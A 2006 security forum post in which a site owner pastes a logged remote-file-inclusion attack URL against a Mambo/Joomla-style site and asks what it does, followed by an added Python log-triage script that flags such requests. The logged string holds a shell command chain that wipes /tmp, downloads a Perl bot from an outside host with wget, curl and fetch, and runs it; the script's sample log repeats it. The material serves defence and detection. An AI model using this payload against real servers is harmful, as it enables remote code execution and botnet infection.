Security Issue: Attempts FROM: shinwhat.com

Discussion in 'Security' started by aeronautic.net, Jun 25, 2006.

  1. #1
    I've been seeing dozens of hits to various URLs on one of my sites from IPs all over the world in the past few days constructed like this string:

    http://A-SNIPPEDDOMAINDOTCOM/SNIPPEDPATH/SNIPPED/index.php?
    _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
    http://www.shinwhat.com/cms/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%20http://www.shinwhat.com/cms/bt.pl;
    wget%20http://www.shinwhat.com/cms/bt.pl;curl%20-O%20http://www.shinwhat.com/cms/bt.pl;
    perl%20bt.pl;perl%20bt.pl.1;perl%20bt.pl.2?
    All contain that reference to shinwhat.com

    Yes, I've written them but the hits keep coming. They are just kicking 403s but I'd like to know what this script (zombie?) is trying to pull off.

    Any ideas?

    Thanks!
     
    aeronautic.net, Jun 25, 2006
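
Added example, not part of the original post: a Python triage script that flags access-log entries carrying the features visible in the string above, namely query parameters named after PHP superglobals (`_REQUEST`, `GLOBALS`), a parameter such as `mosConfig_absolute_path` whose value is a remote URL, and chained download commands inside a parameter value. The log lines, IP addresses, the host `remote.example` and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP variable names a client has no business setting via the query string.
SUPERGLOBALS = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE",
                "_SERVER", "_FILES", "_ENV", "_SESSION"}
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)
# Chained downloader/interpreter commands, as in the cmd= value of the posted string.
SHELL_CHAIN = re.compile(r";\s*(?:wget|curl|fetch|perl)\b", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def inspect_request(target):
    """Return sorted reasons why a request target resembles the posted probe."""
    reasons = set()
    query = target.partition("?")[2]          # everything after the first '?'
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote(name), unquote(value)
        base = name.split("[", 1)[0]          # _REQUEST[option] -> _REQUEST
        if base in SUPERGLOBALS:
            reasons.add("superglobal-override:" + base)
        if REMOTE_URL.match(value):
            reasons.add("remote-url-value:" + name)
        if SHELL_CHAIN.search(value):
            reasons.add("shell-commands:" + name)
    return sorted(reasons)

def scan(log_lines):
    """Map each flagged client IP to the set of reasons seen from it."""
    hits = {}
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        reasons = inspect_request(m.group(1))
        if reasons:
            hits.setdefault(line.split(" ", 1)[0], set()).update(reasons)
    return hits

# Constructed access-log lines (documentation IPs, placeholder host remote.example).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jun/2006:10:00:00 +0000] "GET /index.php?_REQUEST=&'
    '_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&'
    'mosConfig_absolute_path=http://remote.example/tool.gif?&cmd=cd%20/tmp/;'
    'wget%20http://remote.example/bt.pl;perl%20bt.pl HTTP/1.0" 403 -',
    '198.51.100.4 - - [25/Jun/2006:10:00:05 +0000] '
    '"GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG).items():
        print(ip, sorted(why))
```
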